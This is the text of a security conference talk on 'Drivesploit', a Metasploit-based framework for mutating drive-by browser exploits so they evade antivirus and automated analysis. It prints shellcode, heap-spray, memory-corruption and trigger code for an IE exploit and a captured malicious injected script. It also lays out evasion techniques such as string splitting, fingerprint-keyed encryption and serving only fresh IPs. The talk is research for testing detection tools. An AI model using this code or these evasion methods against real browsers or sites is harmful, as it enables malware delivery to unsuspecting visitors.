Drive-by Downloads That Evade AV
DRIVESPLOIT: CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS
Wayne Huang, Cofounder & CTO
Fyodor Yarochkin
Antonio Rohman Fernandez
Chris Hsiao
Armorize Technologies, Inc.
@waynehuang
wayne@armorize.com
One type of browser exploit:
Drive-by Downloads defined
Drive-by-Download Explained
• Hackers distribute malware by "poisoning" legitimate websites
• Typical: injects malicious iframes into HTML content
Drive-by-Download Explained
• Affected websites:
  – Essentially become a delivery mechanism for malware
  – Appear normal
• Victims
  – Do not need to "click" or "agree to" anything
  – Simply connecting to the website executes the attack
Drive-by Download Incidents
• Aurora (Google)
  – June 2009-Feb 2010
  – Targeted attack
  – IE 0day CVE-2010-0249
  – Confirmed publicly by Google, Adobe Systems, Juniper Networks and RackSpace
  – Total of 34 organizations targeted
Drive-by Download Incidents
• DNF666 Mass SQL Injection
  – Since March 2010
  – Jun: Adobe 0day CVE-2010-1297
  – Victims: Wall Street Journal, Jerusalem Post, etc.
  – dnf666.net, robint.us, 2677.in, 4589.in, 22dnf.com
[Screenshots of affected sites: CNN, GameSpot, US Treasury (http://thompson.blog.avg.com/2010/05/treasury-website-hacked.html), PlayStation.com, Washington Post]
Dissecting Drive-By Downloads
[Diagram: Page + Browser → Exploit → Payload = downloader ← Exploit Server]
Dissecting Drive-By Downloads
[Diagram: Page + Browser → Exploit → Payload = downloader ← Exploit Server]
[Captured injected script as shown on the slide, truncated:]
<script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/,/g, ""); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = "
Dissecting Drive-By Downloads
[Diagram as above, now labelled "Exploit!": Page + Browser → Exploit → Payload = downloader ← Exploit Server, with the same captured script]
Dissecting Drive-By Downloads
[Diagram: Exploit! → Exploits / droppers → Dropper executes; served by Exploit Server]
Dissecting Drive-By Downloads
[Diagram: Exploits / droppers ← Exploit Server; Malware ← Malware Server]
Dissecting Drive-By Downloads
[Diagram: Exploits / droppers ← Exploit Server; Malware ← Malware Server; Controller]
Dissecting Drive-By Downloads
But who would visit?
The key now is TRAFFIC
[Diagram: Exploits / droppers ← Exploit Server; Malware ← Malware Server; Controller]
(1) Legitimate, injectable sites
[Diagram: URL Generators → Landing Site → Exploits / droppers ← Exploit Server; Malware ← Malware Server; Controller]
(1) Legitimate, injectable sites
[Diagram: URL Generators → Landing Site → Exploits / droppers ← Exploit Server; Malware ← Malware Server]
• May-Ongoing: DNF666 mass SQL injections
• May-June: Shared hosting compromise, GoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost
• Continuous targeted attacks
(1) Legitimate, vulnerable sites
[Diagram: URL Generators → Landing Site → Exploits / droppers ← Exploit Server; Malware ← Malware Server]
• Mass SQL injections
• Mass hosting compromises
• Directly inside HTML / PHP / ASP
• Hidden inside WordPress files
• Hidden inside DB
• Hidden inside DB stored procedures
(2) Man-in-the-Middle
[Diagram: WAN / LAN; URL Generators → Landing Site → Exploits / droppers ← Exploit Server; Malware ← Malware Server]
• No tampering of website
• LAN: ARP spoofing via ZXARPS and other tools
• WAN: March 2009, middle of route, tw.msn.com, taiwan.cnet.com, others
  Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778
LIVE DEMO 1
http://digg.com/software/Internet_Storm_Center_Diary_2010_02_27
Live demo recap
[Screenshot: Injected javascript in digg.com]
Live demo recap
1. Inject javascript into digg.com
2. Javascript loads iframe from our domain zcrack.org
3. Metasploit (drivesploit) is running on zcrack.org, serves IE peers exploit
4. Bypasses AV
5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe
6. We have a shell :)
MOTIVATION
We provide solutions that monitor websites and detect malicious contents 24x7
We use multiple behavior-, heuristic-, and signature-based technologies
MOTIVATION
Most technologies are developed on our own, BUT,
We also integrate anti-virus, whose licenses are $expensive$
MOTIVATION
We spend a lot of time testing our own technologies, and selecting anti-virus technologies
The key is: how good are we (and they) at detecting NEW drive-by downloads
MOTIVATION
We need a good framework to help us replicate, manipulate, and mutate exploits found in the wild
--into NEW derivatives
DRIVESPLOIT IS BORN
ON TOP OF METASPLOIT
INITIAL FINDINGS
ANTIVIRUS CAPABILITIES DIFFER GREATLY!
DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE
COST != PERFORMANCE
Antivirus vs. Drive-bys
[Diagram: URL Generators → Landing Site → Exploits / droppers ← Exploit Server; Malware ← Malware Server; Controller]
Antivirus vs. Drive-bys
[Diagram, content types marked: URL Generators (JAVASCRIPT) → Landing Site (JAVASCRIPT) → Exploits / droppers (JAVASCRIPT) ← Exploit Server; Malware (PE BINARY) ← Malware Server; Controller]
Antivirus vs. Drive-bys
[Same diagram; the PE BINARY stage is circled: "We will detect this part!!"]
Why we can’t rely on PE detection
• Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on
  – Attack reported to the hosting / registrar
  – Domain banned by ISPs
  – Purchased duration was over
• We want to detect the injection so our customers can remove it
• Actually, statically detecting javascript exploits is quite difficult
THE TAO: ECMA-SCRIPTS
JAVASCRIPT
VBSCRIPT
ADOBE JS
ACTIONSCRIPT
JAVASCRIPT!! (ECMA-SCRIPT)
[Diagram series, stripping the chain down to its javascript stages: URL Generators → Landing Site → Exploits / droppers ← Exploit Server (METASPLOIT); the Malware / Malware Server stages drop out; PAYLOAD: meterpreter (memory injection); Controller]
Drive-By wants to…
• Avoid detection at the victim's desktop
• Avoid detection by UTM/gateways
• Avoid detection by automated monitors
• Live for as long as possible
Drive-By wants to…
CONCLUSION:
• Reduce exposure: Serve SELECTIVELY
• Avoid detection and analysis: Mutate well
Serve Selectively
HTTP LEVEL:
Serve only to:
• Fresh IPs (serve once per IP)
  set HTTP::client::onlyonce true
• Particular referer (e.g. Gumblar)
  set HTTP::referer google.com
• Particular agent string (vulnerable browser)
  set HTTP::agent::MSIE 7.0
• Black list
  set HTTP::client::blacklist false
SCRIPT MUTATION
For exploit
For payload
The goal is not to "obfuscate"...
JAVASCRIPT EXPLOIT DISSECTED
[Diagram: the four parts of a javascript exploit: Shellcode, M Corrupt (memory corruption), Heapspray, Trigger]
JAVASCRIPT EXPLOIT DISSECTED
Shellcode (string truncated on the slide):
<script>var shellraw = "%u7679%u4673%u757b%u924e%u66b9%ub441%u018d%u7df9%u241c%ud631%u40b7%ueb11%u043d%ube97%u212c%u05e1%u8335%u42fc%ub893%u227f%u98d4%u484b%u8c90%u13e0%uf8d3%u7aba%u7278%u2034%u49f5%u259f%u9137%u339b%u1dd5%ub1b0%u3f99%u2f43%u3cb6%ub2a8%ub30c%u4714%u3d7b%ue138%uf803%u66b2%u97b9%u9335%u767a%ub805%ue201%u4a2f%u85a8%u7eeb%uf93b%u414f%u257d%u78bf%u2c43%u7f99%ubb2d%ub098%ub342%u918d%u3fb2%u704a%u7147%u7f74%u3073%u77f9%ubb40
JAVASCRIPT EXPLOIT DISSECTED
M Corrupt:
var j_object = document.createElement('body');
j_object.addBehavior('#default#userData');
document.appendChild(j_object);
try {
  for (counter=0; counter<10; counter++) {
    j_object.setAttribute('s',window);
  }
} catch(e){ } window.status+='';}
JAVASCRIPT EXPLOIT DISSECTED
Heapspray (the slide labels the second part "Buffer Ovf" here):
var counter;var shellcode = unescape(shellraw);
var memory = new Array();
var slackspace = 0x86000-(shellcode.length*2);
var nops = unescape("%u0c0c%u0c0c");
while(nops.length<slackspace/2) { nops+=nops; }
var fillblock = nops.substring(0,slackspace/2);
delete nops;
for(counter=0; counter<270; counter++) {memory[counter] = fillblock + fillblock + shellcode;
JAVASCRIPT EXPLOIT DISSECTED
Trigger:
<button id='j_id' onclick='bootstrapper();' style='display:none'></button>
…
document.getElementById('j_id').onclick();
JAVASCRIPT EXPLOIT DISSECTED
[Diagram: Primitive Form (Shellcode, M Corrupt, Heapspray, Trigger) → OBFUSCATED BLOB + DE-OBFUSCATOR = Obfuscated Form]
Dissecting Drive-By Downloads
[Diagram repeated: Exploit! → Page + Browser → Exploit → Payload = downloader ← Exploit Server, with the captured script shown earlier]
JAVASCRIPT EXPLOIT DISSECTED
[Diagram, built up over three slides: Start from the Primitive Form (Shellcode, M Corrupt, Heapspray, Trigger); Mutate the OBFUSCATED BLOB and the DE-OBFUSCATOR; Prevent the trigger from firing in the Obfuscated Form]
MUTATION FEATURES IMPLEMENTED SO FAR
1. Javascript Random Variable Auto Replacement
• Accepts a piece of javascript
• Parses the javascript according to grammar
• Auto replaces all variable names and function names with random names
• Passes back:
  a) the new javascript
  b) a vector of old-new name mappings
1. Javascript Random Variable Auto Replacement
randomized = Rex::Exploitation::DriveSploit::obfuscatejs(js, Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)
2. Javascript Concat String Obfuscation
arr = Rex::Exploitation::DriveSploit.obfuscatejs(shellcode, Rex::Exploitation::DriveSploit::STRING_CONCAT)
shellcode_script = arr[0]
shellcode_var = arr[1]
2. Javascript Concat String Obfuscation
%u7679%u4673%u757%u924e
Layer 1: split into literals (left), then shuffle their order (right)
A1 = "%u7";      A3 = "u4673%";
A2 = "679%";     A4 = "u75";
A3 = "u4673%";   A1 = "%u7";
A4 = "u75";      A5 = "7%u92";
A5 = "7%u92";    A2 = "679%";
A6 = "4e";       A6 = "4e";
2. Javascript Concat String Obfuscation
%u7679%u4673%u757%u924e
Layer 2: pairwise concatenations (left) over the shuffled literals (right)
B1 = A1+A2;      A3 = "u4673%";
B2 = A3+A4;      A4 = "u75";
B3 = A5+A6;      A1 = "%u7";
                 A5 = "7%u92";
                 A2 = "679%";
                 A6 = "4e";
2. Javascript Concat String Obfuscation
%u7679%u4673%u757%u924e
Layer 2 shuffled and renamed (left: before, right: after)
B1 = A1+A2;      B2 = A1+A2;
B2 = A3+A4;      B3 = A5+A6;
B3 = A5+A6;      B1 = A3+A4;
2. Javascript Concat String Obfuscation
%u7679%u4673%u757%u924e
A3 = "u4673%";A4 = "u75";
A1 = "%u7";
A5 = "7%u92";A2 = "679%";
A6 = "4e"; B2 = A1+A2;
B1 = A3+A4;B3 = A5+A6;C1=B2+B1;
D1=C1+B3;
// variable names are randomized
3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
# insert a fixed 6-character random
# string, for every 4-8 characters
shellcode = insertret[0]
random_insertion_string = insertret[1]
returns
a) a piece of javascript containing the injected string
b) Javascript variable name containing the reverted, original string
4. Numeric Literal Mutation
slackspace = Rex::Exploitation::DriveSploit.obfuscateNumber(0x86000)
(246*2)+(5676*96)+(34*4)+8+(3332*1)
4. Numeric Literal Mutation
slackspace = 0x86000
becomes
slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)
Trigger Prevention
[Diagram: Start → Primitive Form (Shellcode, M Corrupt, Heapspray, Trigger) → OBFUSCATED BLOB + DE-OBFUSCATOR → Obfuscated Form; Prevent applies at the trigger]
Trigger prevention
• <div onload
• <img onload
• var a=1; var b=0;
  do {
    useless code;
  } while (a==b);
• Fingerprinting-based encryption
TESTING IT OUT
Using the IE peers exploit as example
CVE-2010-0806 (MS10-018)
PLAIN: 17/42
RANDOM VARS: 16/42
INJECT SC: 13/42
RANDVAR+CONCAT SC+INJECT SC: 11/42
ROUGHLY 6/17 ANTI-VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
CONCAT SC+CODE: 1/42
INJECT SC+CONCAT CODE: 0/42
RANDVAR+INJECT SC+CONCAT CODE: 0/42
ANTIVIRUS DESKTOP VERSION IS MUCH STRONGER
ANTIVIRUS DESKTOP VERSION
• Can monitor host environment
  – Hook into browsers
  – Easier to get raw form of exploit
• Behavior analysis
  – Buffer overflow behavior
  – Download-to-file behavior
AntiVirus Desktop Kung Fu
                           To   Ag   Sc   Aa   Ky
 Plain                     ✖    ✖    ✔    ✔    ✔
 Random variables          ✖    ✖    ✔    ✔    ✔
 Split literals            ✖    ✖    ✔    ✔    ✔
 Injection SC              ✖    ✖    ✔    ✔    ✔
 Concat SC                 ✖    ✖    ✔    ✔    ✔
 Concat CODE               ✖    ✔    ✖    ✔    ✔
 Concat SC + Concat CODE   ✖    ✖    ✖    ✔    ✔
 Inject SC + Concat CODE   ✖    ✖    ✖    ✖    ✔
AntiVirus Desktop Kung Fu
                           To   Ag   Sc   Aa   Ky   M
 Plain                     ✖    ✖    ✔    ✔    ✔    ✔✔
 Random variables          ✖    ✖    ✔    ✔    ✔    ✔✔
 Split literals            ✖    ✖    ✔    ✔    ✔    ✔✔
 Injection SC              ✖    ✖    ✔    ✔    ✔    ✖✔
 Concat SC                 ✖    ✖    ✔    ✔    ✔    ✖✔
 Concat CODE               ✖    ✔    ✖    ✔    ✔    ✖✔
 Concat SC + Concat CODE   ✖    ✖    ✖    ✔    ✔    ✖✔
 Inject SC + Concat CODE   ✖    ✖    ✖    ✖    ✔    ✖✔
LIVE DEMO 2
DESKTOP ANTIVIRUS BYPASS
5. FINGERPRINTING-BASED ENCRYPTION
Wepawet doesn’t tell much
[Screenshots: Wepawet analysis results]
Browser Feature Table
                                                       IE7     FF      Safari         Opera   Chrome
Is_contextmenu_event_supported                         True    True    True           False   True
String_prototype_replace_ignore_functions              False   False   True (2.0.2)   False   False
Is_ES5_strict_mode_supported                           False   False   False          False   False
Array_prototype_slice_can_convert_to_array             False   True    True           True    True
Getelementsbytagname_returns_comment_nodes             True    False   False          False   False
Is_element_tagname_uppercased                          True    True    True           True    True
Is_canvas_element_supported                            False   True    True           True    True
Is_DOMFocusIn_supported                                False   False   True           True    True
Is_CSS_boder_radius_supported                          False   True    True           False   True
Function_identified_leaks_onto_enclosing_scope         True    False   False          False   False
Script_element_rejects_textnode_appending              True    False   False          False   False
Is_contextmenu_event_supported                         True    True    True           False   True
Is_position_fixed_supported                            False   True    True           False   True
Computed_style_return_static_positioned_element        False   False   False          True    False
5. Fingerprinting-Based Encryption Summary
• "This exploit works only for IE6"
• "Give me an encrypted version of my javascript exploit"
• "Give me javascript to generate the decoding key"
• "The key is only correctly generated if the javascript is run under IE6"
5. Fingerprinting-Based Encryption Summary
A=Check1();
B=Check3();
C=Check4();
D=Check6();
E=Check8();
F=Check9();
G=Check12();
H=Check14();
5. Fingerprinting-Based Encryption Summary
(left: one ordering of the checks; right: the same checks reordered)
A=Check1();    A=Check6();
B=Check3();    B=Check12();
C=Check4();    C=Check8();
D=Check6();    D=Check1();
E=Check8();    E=Check4();
F=Check9();    F=Check14();
G=Check12();   G=Check3();
H=Check14();   H=Check9();
5. Fingerprinting-Based Encryption Summary
[Same two columns, annotated: the check results form a one-time key; encrypt the javascript exploit with it; generate the decoding javascript]
Why not Anti-Virus?
• AV is to install on desktops / notebooks
• Complicated normal behaviors
• Strict resource constraints
• Therefore, AV and gateway vendors rely on:
  – Signature-based pattern matching technologies
  – LIGHTWEIGHT and ACCURATE
• Why can’t such technology be used to detect drive-by-downloads?
Javascripts are not harmful to the environment…
… so they are usually not reused
AV no good because drive-by-downloads are in:
• Disposable Javascript
• Disposable PDF Adobe JS
• Disposable Flash actionscript
• All ECMA-scripts
you don't usually reuse them…
Javascript Packing Is a Norm
• Packing is widely used by legitimate code!
  – To protect javascript source code
  – To reduce javascript size
• Google Closure Compiler
  – http://code.google.com/closure/compiler/
• Yahoo Javascript Packer (YUI Compressor)
  – http://developer.yahoo.com/yui/compressor/
• Advanced HTML Protector
  – http://www.creabit.com/htmlprotect/
• Dean Edwards’ Packer
  – http://dean.edwards.name/packer/
• Online JS Obfuscator
  – http://www.iwebtool.com/html_encrypter
• http://www.cha88.cn/safe/fromCharCode.php
… OK so AV doesn’t work (that well)…
How about behavior-based approaches?
Defeating Behavior Analysis
1. Use VBScript
  – Exploits in VBScript
  – URL generators in VBScript
  – Exploits in / generated by VBScript
  – May defeat SpiderMonkey et al (Rhino, JSunPack, etc)
2. Don’t serve to detectors
  – You can’t detect what you don’t have
  – Serve to each IP only once
  – Detect agent strings
  – Collect robot IPs: Google, Yahoo, security vendors
Defeating Behavior Analysis
3. Fingerprint-based encryption
4. Little but effective techniques
  – Sleep(30000); //using SetTimeout
  – Timelock puzzles
Future Work
• Randomly chop up scripts and split into individual files
• Generating VBscript instead of javascript
• Encrypting using data existing outside of HTML
  – HTTP headers
Discussion
• The Panopticlick experiment by Eckersley of EFF
  – 94.2% of "typical desktop browsers" are unique
• Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of targeted attacks?
THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www.drivesploit.org
Credits: Wayne Huang, Fyodor Yarochkin, Antonio Rohman Fernandez
Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding, Felix, Cola

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

  • 1. 掛馬免殺 DRIVESPLOIT CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS Wayne Huang, Cofounder & CTO Fyodor Yarochkin Antonio Rohman Fernandez Chris Hsiao Armorize Technologies, Inc. @waynehuang wayne@armorize.com @ i
  • 2. One type of browser exploit: Drive-by Downloads defined 2
  • 3. Drive-by-Download Explained • Hackers distribute malware by "poisoning" legitimate websites • Typical: injects malicious iframes into HTML content 3
  • 4. Drive-by-Download Explained • Affected websites: – Essentially becomes a delivery mechanism for malware – Appear normal • Victims – Do not need to "click" or "agree to" anything – Simply connecting to the website executes the attack 4
  • 5. Drive-by Download Incidents • Aurora (Google) – June 2009-Feb 2010 –TTargeted attack t d tt k – IE 0day CVE-2010-0249 – Confirmed publicly by Google, Adobe Systems, Juniper Networks and R kS d RackSpace – Total of 34 organization targeted g g
  • 6. Drive-by Download Incidents • DNF666 Mass SQL Injection – Since March, 2010 –JJun: Adobe 0day CVE-2010-1297 Ad b 0d CVE 2010 1297 – Victims: Wall Street Journal, Jarusalem P t etc J l Post, t – dnf666.net, robint.us, 2677.in, 4589.in, 22d f 4589 i 22dnf.com
  • 7. CNN
  • 12. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d 12
  • 13. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  13
  • 14. Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  14
  • 15. Dissecting Drive-By Downloads Exploit! Exploits / droppers Exploits / droppers Dropper executes Exploit Server 15
  • 16. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server 16
  • 17. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 17
  • 18. Dissecting Drive-By Downloads But who would visit? But who would visit? The key now is TRAFFIC Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 18
  • 19. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 19
  • 20. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site  May-Ongoing:/ DNF666 mass SQ ay O go Exploits droppers 666 ass SQL g Exploits / droppers injections Exploit Server  May-June: Shared hosting compromise, Malware GoDaddy, RackSpace, GoDaddy RackSpace Network Solutions, BlueHost, DreamHost Malware Server  Continuous targeted attacks 20
  • 21. (1) Legitimate, vulnerable sites URL Generators Landing Site Landing Site  Mass SQL injections Exploits / droppers Exploits / droppers  Mass hosting compromises Exploit Server  Directly inside HTML / PHP / ASP Malware  Hidden inside WorldPress files  Hidden inside DB Malware Server  Hidden inside DB stored procedures 21
  • 22. (2) Man-in-the-Middle WAN LAN URL Generators Landing Site Landing Site  No tampering of website p Exploits / droppers g Exploits / droppers  LAN: ARP spoofing via ZXARPS and other Exploit Server tools Malware  WAN: March 2009, middle of route 2009 route, tw.msn.com, taiwan.cnet.com, others Malware Server Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778 22
  • 25. Live demo recap Injected javascript in digg.com
  • 26. Live demo recap 1. Inject javascript into digg.com j j p gg 2. Javascript loads iframe from our domain zcrack.org 3. Metasploit (drivesploit) is running on zcrack.org, zcrack org serves ie peers exploit 4. Bypasses AV 5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe notepad exe 6. We have a shell :)
  • 27. MOTIVATION We provide solutions that monitors p websites and detect malicious contents 24 7 t t 24x7 We use multiple behavior-, heuristic-, p , , and signature-based technologies 27
  • 28. MOTIVATION Most technologies are developed on our own, BUT, We also integrate anti-virus, whose licenses are $expensive$ 28
  • 29. MOTIVATION We spend a lot of time testing our own technologies, and selecting anti-virus technologies t h l gi The key is: how good are we (and them) at detecting NEW drive-by downloads 29
  • 30. MOTIVATION We need a good framework to help us g p replicate, manipulate, and mutate exploits found in the wild --into NEW derivatives 30
  • 31. DRIVESPLOIT IS BORN ON TOP OF METASPLOIT 31
  • 32. INITIAL FINDINGS ANTIVIRUS CAPABILITIES DIFFER GREATLY! DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE COST != PERFORMANCE
  • 33. Antivirus vs. Drive-bys URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 33
  • 34. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server Controller 34
  • 35. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server We will detect  We will detect Controller 35 this part!!
  • 36. Why we can’t rely on PE detection • Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on – Attack reported to the hosting / registrar – Domain banned by ISPs – Purchased duration was over • We want to detect the injection so our customers can remove it • Actually statically detecting javascript exploits is Actually, quite difficult 36
  • 37. THE TAO: ECMA-SCRIPTS ECMA SCRIPTS JAVASCRIPT VBSCRIPT ADOBE JS ACTIONSCRIPT 37
  • 38. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 38
  • 39. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Controller 39
  • 40. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Controller 40
  • 41. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server (METASPLOT) Controller 41
  • 42. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers PAYLOAD Exploit Server meterpreter (METASPLOT) (memory injection) Controller 42
• 43. Drive-By wants to… • Avoid detection at the victim's desktop • Avoid detection by UTM/gateways • Avoid detection by automated monitors • Live for as long as possible
• 44. Drive-By wants to… CONCLUSION: Reduce exposure: serve SELECTIVELY. Avoid detection and analysis: mutate well.
• 45. Serve Selectively – HTTP LEVEL: serve only to: • Fresh IPs (serve once per IP): set HTTP::client::onlyonce true • Particular referer (eg. Gumblar): set HTTP::referer google.com • Particular agent string (vulnerable browser): set HTTP::agent::MSIE 7.0 • Black list: set HTTP::client::blacklist false
• 46. SCRIPT MUTATION – For exploit, for payload
  • 47. The goal is not to "obfuscate"...
• 48. JAVASCRIPT EXPLOIT DISEC – parts: Shellcode / M Corrupt / Heapspray / Trigger
• 49. JAVASCRIPT EXPLOIT DISEC – Shellcode:
  <script>var shellraw = "%u7679%u4673%u757b%u924e%u66b9%ub441%u018d%u7df9%u241c%ud631%u40b7%ueb11%u043d%ube97%u212c%u05e1%u8335%u42fc%ub893%u227f%u98d4%u484b%u8c90%u13e0%uf8d3%u7aba%u7278%u2034%u49f5%u259f%u9137%u339b%u1dd5%ub1b0%u3f99%u2f43%u3cb6%ub2a8%ub30c%u4714%u3d7b%ue138%uf803%u66b2%u97b9%u9335%u767a%ub805%ue201%u4a2f%u85a8%u7eeb%uf93b%u414f%u257d%u78bf%u2c43%u7f99%ubb2d%ub098%ub342%u918d%u3fb2%u704a%u7147%u7f74%u3073%u77f9%ubb40…
• 50. JAVASCRIPT EXPLOIT DISEC – M Corrupt:
  var j_object = document.createElement('body');
  j_object.addBehavior('#default#userData');
  document.appendChild(j_object);
  try {
    for (counter=0; counter<10; counter++) { j_object.setAttribute('s',window); }
  } catch(e){ }
  window.status+='';
• 51. JAVASCRIPT EXPLOIT DISEC – Heapspray (Buffer Ovf):
  var counter;
  var shellcode = unescape(shellraw);
  var memory = new Array();
  var slackspace = 0x86000 - (shellcode.length*2);
  var nops = unescape("%u0c0c%u0c0c");
  while(nops.length<slackspace/2) { nops+=nops; }
  var fillblock = nops.substring(0,slackspace/2);
  delete nops;
  for(counter=0; counter<270; counter++) { memory[counter] = fillblock + fillblock + shellcode; }
• 52. JAVASCRIPT EXPLOIT DISEC – Trigger:
  <button id='j_id' onclick='bootstrapper();' style='display:none'></button>
  …
  document.getElementById('j_id').onclick();
• 53. JAVASCRIPT EXPLOIT DISEC – Shellcode / M Corrupt / Heapspray / Trigger → OBFUSCATED BLOB → DE-OBFUSCATOR. Primitive Form → Obfuscated Form
• 54. Dissecting Drive-By Downloads – Page + Browser Exploit → Exploit! Payload = downloader; Exploit Server. Captured sample (truncated on the slide):
  <script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8…
  var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString(); cc=cc.replace(/,/g, ""); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = "…
